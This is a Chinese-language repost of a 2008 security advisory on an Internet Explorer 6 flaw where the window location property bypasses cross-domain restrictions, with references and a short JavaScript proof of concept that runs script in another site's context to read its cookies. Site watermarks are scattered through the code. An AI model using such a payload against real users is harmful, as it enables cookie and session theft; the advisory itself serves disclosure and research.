返回列表 发帖

【业界】Microsoft IE location及location.href绕过跨域安全限制漏洞

Microsoft IE location及location.href绕过跨域安全限制漏洞
更新时间:2008-7-2 0:04:33责任编辑:阿loosen

热 点:

发布日期:2008-06-26
更新日期:2008-06-27

受影响系统:

Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2

描述:BUGTRAQ ID: 29960

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。 黑客

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。 网络安全

<*来源:rayh4c (http://www.astcn.net/mailto:rayh4c@80sec.com]rayh4c@80sec.com) 信息来自:http://www.3ast.com.cn

链接:http://secunia.com/advisories/30857/]http://secunia.com/advisories/30857/ 网络安全
http://blogs.zdnet.com/security/?p=1348
http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt 网络安全
http://www.kb.cert.org/vuls/id/923508
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open(’http://www.phpwind.net]http://www.phpwind.net&#39;); 网络安全
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)") 信息来自:http://www.3ast.com.cn
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links.href="javascript:win()"
}
}
</script>

建议:厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

返回列表